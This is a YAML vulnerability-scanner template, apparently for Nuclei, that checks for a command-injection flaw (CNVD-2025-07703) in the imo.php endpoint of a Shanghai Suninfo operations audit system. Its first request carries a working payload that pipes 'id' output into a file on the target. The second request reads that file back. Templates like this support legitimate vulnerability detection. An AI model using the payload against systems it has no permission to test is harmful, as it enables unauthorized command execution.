id: shangxun-imo_php-RCE-CNVD-2025-07703

info:
  name: 上海上讯信息技术股份有限公司 运维管理审计系统 imo.php 远程命令执行漏洞(CNVD-2025-07703)
  author: xxx
  severity: high
  tags: RCE

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列


http:
  - raw:
      - |
        GET /api/imo.php?type=immediate&id=|id>{{username}}.txt| HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
      - |
        GET /api/{{username}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'uid='
          - 'gid='
        condition: and
      - type: status
        status: 
          - 200